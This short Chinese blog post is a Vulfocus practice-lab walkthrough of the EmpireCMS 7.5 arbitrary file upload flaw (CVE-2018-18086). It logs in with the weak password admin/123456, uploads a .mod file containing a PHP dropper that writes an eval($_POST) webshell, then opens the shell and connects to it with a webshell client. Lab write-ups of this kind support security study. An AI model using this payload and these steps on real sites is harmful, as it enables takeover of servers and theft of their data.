Vulfocus靶场 | empirecms 文件上传 (CVE-2018-18086)

漏洞描述

EmpireCMS(帝国网站管理系统)是一套内容管理系统(CMS)。 EmpireCMS 7.5版本中的e/class/moddofun.php文件的‘LoadInMod’函数存在安全漏洞。攻击者可利用该漏洞上传任意文件。

影响范围

EmpireCMS<=7.5

漏洞复现

进入后台

http://123.58.224.8:14326/empirecms/e/admin/

 

弱口令admin/123456登陆成功

依次点击

 

上传一句话木马,后缀名为.mod

<?php file_put_contents("shell.php","<?php @eval(\$_POST[cmd]); ?>");?>

 

接着访问

http://123.58.224.8:14326/empirecms/e/admin/shell.php

看看有没有成功解析

webshell管理工具连接

 

 

 

 

 

posted @ 2022-08-14 12:06  mlxwl  阅读(433)  评论(0编辑  收藏  举报